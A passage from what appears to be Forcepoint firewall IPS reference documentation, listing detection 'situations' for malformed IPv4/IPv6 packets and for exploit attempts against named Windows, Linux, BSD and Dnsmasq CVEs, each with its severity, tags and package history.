Vulnerability: Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21689
Description:
Back to top

IPv4_Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690

About this situation: An attempt to exploit a vulnerability in Extensible Authentication Protocol (EAP) service detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, Extensible Authentication Protocol (EAP) service, MS2023-02, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1556-5242
Last changed: sgpkg-ips-1556-5242
Vulnerability: Microsoft-PEAP-Heap-Overflow-Vulnerability-CVE-2023-21690
Description:
Back to top

IPv4_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1646-5242
Last changed: sgpkg-ips-1646-5242
Vulnerability: Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
Description:
Back to top

IPv4_Microsoft-Windows-PGM-Handling-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Microsoft-Windows-PGM-Handling-Remote-Code-Execution
Description:
Back to top

IPv4_Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Vulnerability: Microsoft-Windows-PGM-PARITY_PRM_TGS-Handling-Code-Execution
Description:
Back to top

IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2024, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Microsoft-Windows-Pragmatic-General-Multicast-Allocatedatabuffer-Use-After-Free
Description:
Back to top

IPv4_Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2023, Windows not specific, Suspected Denial of Service, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1645-5242
Last changed: sgpkg-ips-1645-5242
Vulnerability: Microsoft-Windows-Pragmatic-General-Multicast-Packet-Length-Integer-Underflow
Description:
Back to top

IPv4_SCTP-Unknown-Chunk-Type

About this situation: An SCTP packet with an unknown chunk type was detected
Context: Generic IP Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2007, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-Netfilter-SCTP-Unknown-Chunk-Types-Denial-Of-Service
Description:
Back to top

IPv4_Version-Not-4

About this situation: IPv4 header's version field doesn't have value 4
Context: IP without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-561-5211
Description: IPv4 header's version field doesn't have value 4. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Address-is-IPv4-mapped

About this situation: IPv6 address is IPv4 mapped
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The source or destination address of an IPv6 frame is a so called IPv4 mapped IPv6 address, which should not appear in the network. This frame will not be analyzed.
Back to top

IPv6_Atomic-Fragment

About this situation: Atomic IPv6 fragment
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-637-5211
Vulnerability: Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24094
Windows-TCP-IP-Remote-Code-Execution-CVE-2024-38063
Description: An IPv6 packet contains a fragment header where offset and more-fragments fields are zero. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Authentication-header-detected

About this situation: IPv6 Authentication header was detected
Context: IPv6 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-201-2032
Description: The Authentication header is present in an IPv6 datagram.
Back to top

IPv6_Authentication-header-length-incorrect

About this situation: IPv6 authentication header's length is not correct
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-561-5211
Description: The length field of the Authentication extension header within an IPv6 datagram has illegal value. When used with IPv6, the Authentication extension header's size must be an integral multiple of 64 bits, which means that the length field must have an even value. An IPv6 datagram with odd length field value in Authentication header should not be generated by the specifications. The packet was either corrupted in transit or it was crafted manually. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Destination-Options-detected

About this situation: IPv6 Destination Options header was detected
Context: IPv6 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-201-2032
Description: The Destination Options header is present in an IPv6 datagram.
Back to top

IPv6_Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in DNSmasq/Mikrotik DNSmasq detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dnsmasq, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1009-5242
Vulnerability: Dnsmasq-ICMP6_Packet-Heap-Buffer-Overflow
Description:
Back to top

IPv6_Extension-header-length-inconsistency

About this situation: IPv6 extension header's length is inconsisten with its type
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The IPv6 extension header's length is inconsistent with its type. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Extension-header-recommended-order-inconsistency

About this situation: IPv6 extension headers are not in recommended order
Context: IPv6 without parameters
Severity: 2
Tags: Invalid Packet Attacks
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1383-5242
Description: The IPv6 extension headers are not in recommended order. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Extension-headers-incomplete

About this situation: IPv6 extension headers are incomplete
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Vulnerability: IPv6-Solaris-Malformed-Packet-DOS
Red-Hat-Netkvm-Virtio-Win-GetXxpHeaderAndPayloadLen-Integer-Underflow
Microsoft-TCP-IP-Remote-Code-Execution-CVE-2021-24094
Windows-TCP-IP-Remote-Code-Execution-CVE-2024-38063
Description: The chain of extension headers in an IPv6 datagram is incomplete. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Fragment-Invalid-Size

About this situation: IPv6 fragment with invalid payload size
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: The IPv6 fragment had an invalid size. All but the last fragment of a packet must have a fragment payload length divisible by eight [RFC 2460]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Fragment-Size-Zero

About this situation: IPv6 fragment has zero size
Context: IPv6 without parameters
Severity: 6
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 fragment with the length of zero bytes was detected. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in FreeBSD Project FreeBSD detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2014, FreeBSD not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: FreeBSD-Rtsold-Dname_labeldec-Stack-Buffer-Overflow
Description:
Back to top

IPv6_FreeBSD-SCTP-ICMPv6-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in FreeBSD Project FreeBSD detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: FreeBSD, Any Hardware, CVE2016, FreeBSD not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-725-5211
Vulnerability: FreeBSD-SCTP-ICMPv6-Denial-Of-Service
Description:
Back to top

IPv6_Hop-by-Hop-Options-detected

About this situation: IPv6 Hop-by-Hop Options header was detected
Context: IPv6 without parameters
Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-201-2032
Description: The Hop-by-Hop Options header is present in an IPv6 datagram.
Back to top

IPv6_Hop-Limit-Varies

About this situation: IPv6 Fragments of same datagram have different hop limit
Context: IPv6 without parameters
Severity: 2
Tags: Protocol Information, Anomalies
First detected in: sgpkg-ips-405-4219
Last changed: sgpkg-ips-405-4219
Description: Fragments belonging to the same IPv6 datagram had different hop limits. Fragments belonging to the same datagram are usually sent over the same route and should have same hop limit. Different hop limits could indicate a hop limit based evasion. Risk analysis: Risk level is fairly low. Most relevant log fields: "IP source" shows the source IP address in the datagram. "IP destination" shows the destination IP address in the datagram. "IP TTL / hop limit" shows two different hop limit values.
Back to top

IPv6_Hop-Limit-Zero

About this situation: IPv6 Hop Limit value was zero
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
Description: The Hop Limit value was zero in an IPv6 datagram. A packet with zero Hop Limit should no longer be present in the network. The packet should have been dropped by the last forwarding router. An IPv6 datagram with zero Hop Limit should not be sent out according to the TCP/IP specifications. Risk analysis: Risk level is fairly low. Most relevant log fields: "IP source" shows the source IP address in the datagram. "IP destination" shows the destination IP address in the datagram. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The usability of this situation in the inspection exception rules is different between engine versions 7.0 and older and 7.1 and newer. In engine versions 7.0 and older, an inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. From engine version 7.1 onwards, the source and destination fields can be used for matching with this situation in the inspection policy. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Home-Address-Option

About this situation: Invalid Mobile IPv6 Home Address option
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An invalid Mobile IPv6 Home Address option was detected. The Home Address option is used in a packet sent by a mobile IPv6 node while away from its home network, to inform the recipient of the mobile node's home address. The address in the option has to be a routable unicast address [RFC 6275]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Hop-by-Hop-Header-Position

About this situation: Invalid IPv6 Hop-by-Hop Options header position
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: The IPv6 packet contained a Hop-by-Hop Options header that did not appear immediately after the IPv6 header. The only allowed position for the header is next to the IPv6 header [RFC 2460]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Jumbo-Payload-Option

About this situation: Invalid Jumbo Payload option
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An invalid IPv6 Jumbo Payload option was detected. The Jumbo Payload option allows the payload of an IPv6 packet to exceed 65,535 bytes. The option is valid only if the payload size is at least 65,536 and there is no fragmentation [RFC 2675]. Proper usage of the Jumbo Payload option requires network links whose maximum transmission units are at least 65,576 bytes on the Internet protocol level. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Mobility-Header

About this situation: Invalid IPv6 Mobility Header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 packet contained a badly formed Mobility Header. The Mobility Header is part of Mobile IPv6 [RFC 6275]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Quick-Start-Option

About this situation: Invalid Quick-Start Option for IPv6
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An invalid Quick-Start option for IPv6 was detected. The Quick-Start mechanism is an optional extension to determine an allowed sending rate for transport protocols [RFC 4782]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Type0-Routing-Header

About this situation: Invalid Type 0 Routing Header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Vulnerability: Microsoft-TCP-IP-Denial-Of-Service-CVE-2021-24086
Description: An IPv6 packet contained an invalid Type 0 Routing header. The Type 0 Routing header is used by an IPv6 source to list one or more intermediate nodes to be visited on the way to a packet's destination. The header must not contain multicast addresses and its address pointer must be within the bounds of the header [RFC 2460]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Invalid-Type2-Routing-Header

About this situation: Invalid Type 0 Routing Header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 packet contained an invalid Type 2 Routing header. The Type 2 Routing header is used in the context of Mobile IPv6 when a correspondent sends a packet directly to the mobile node's care-of address. The header defines the home address of the mobile node. The address has to be a routable unicast address [RFC 6275]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Linux, Red Hat Enterprise Linux, Any Hardware, CVE2014, Linux not specific, Red Hat Enterprise Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-724-5211
Vulnerability: Linux-Kernel-SCTP-Asconf-Chunk-Parameter-Padding-Denial-Of-Service
Description:
Back to top

IPv6_Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference

About this situation: An attempt to exploit a vulnerability in Linux Kernel detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Linux, Red Hat Enterprise Linux, Any Hardware, CVE2014, Linux not specific, Red Hat Enterprise Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Vulnerability: Linux-Kernel-SCTP-Asconf-Init-Null-Pointer-Dereference
Description:
Back to top

IPv6_Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow

About this situation: An attempt to exploit a vulnerability in Linux Kernel Project Kernel detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2014, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-758-5211
Vulnerability: Linux-Kernel-SCTP-SK_ACK_Backlog-Integer-Underflow
Description:
Back to top

IPv6_Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Linux Kernel Organization Linux Kernel detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Linux, Any Hardware, CVE2010, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-755-5211
Last changed: sgpkg-ips-755-5211
Vulnerability: Linux-Kernel-SCTP_Rcv_Ootb-Remote-Denial-Of-Service
Description:
Back to top

IPv6_Loopback-Address

About this situation: IPv6 loopback address detected
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-568-5211
Last changed: sgpkg-ips-568-5211
Description: The IP Version 6 Addressing Architecture RFC 4291 requires in section 2.5.3 that the packets seen in the network having the IPv6 loopback address must be dropped. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254

About this situation: An attempt to exploit vulnerability in Microsoft Windows detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, MS2014-02, CVE2014, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Windows-IPv6-DoS-Vulnerability-CVE-2014-0254
Description:
Back to top

IPv6_Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Microsoft Windows detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, MS2010-02, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-766-5211
Vulnerability: Microsoft-Windows-IPv6-Router-Advertisement-Stack-Buffer-Overflow
Description:
Back to top

IPv6_Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899

About this situation: An attempt to exploit vulnerability in Microsoft Windows detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-10, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Windows-TPC-IP-Denial-Of-Service-CVE-2020-16899
Description:
Back to top

IPv6_Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898

About this situation: An attempt to exploit vulnerability in Microsoft Windows detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: Windows, Any Hardware, MS2020-10, CVE2020, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1287-5242
Last changed: sgpkg-ips-1287-5242
Vulnerability: Microsoft-Windows-TPC-IP-Remote-Code-Execution-CVE-2020-16898
Description:
Back to top

IPv6_Mobility-Header-Invalid-Nexthdr

About this situation: Invalid NextHdr in IPv6 Mobility Header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 packet contained a Mobility Header with an invalid NextHdr value. The header should be the last header in a packet's header chain [RFC 6275]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_Mobility-Header-Unknown-Type

About this situation: Unknown Message Type in IPv6 Mobility Header
Context: IPv6 without parameters
Severity: 2
Tags: Suspected Invalid Packet Attacks
First detected in: sgpkg-ips-667-5211
Last changed: sgpkg-ips-667-5211
Description: An IPv6 packet contained a Mobility Header with an unknown message type which is not defined in the Mobile IPv6 standard [RFC 6275]. Note: This situation is caused by an invalid packet. All other matching constraints than the situation id are ignored. In case of a link-layer packet, the packet is passed without any further processing if the action is Permit. This situation has to be correlated in the log server context. Note: This situation is a packet validity check situation. As an example, block listing is not possible for this situation, and it cannot be used in correlations performed on the engine. The IP header for this traffic is not considered valid, and thus the IP header information cannot be used for matching in the inspection policy. An inspection exception rule for this situation will ignore all other matching fields, such as source and destination. Values selected in the exception rule, such as Action and Logging, will apply globally. For more information, and for the list of all packet validity situations, see the following Knowledge Base Article: https://support.forcepoint.com/s/article/What-are-Next-Generation-Firewall-sanity-check-situations
Back to top

IPv6_OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in OpenBSD detected
Context: Generic IPv6 Fingerprinting Stream
Severity: 7
Tags: OpenBSD, Any Hardware, CVE2007, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-765-5211
Vulnerability: OpenBSD-Kernel-ICMPv6-Handling-Buffer-Overflow
Description:
Back to top

IPv6_Option-data-length-incorrect

About this situation: IPv6 option's data length is not correct
Context: IPv6 without parameters
Severity: 5
Tags: Suspected Invalid Packet Attacks, Anomalies
First detected in: sgpkg-ips-154-2032
Last changed: sgpkg-ips-561-5211
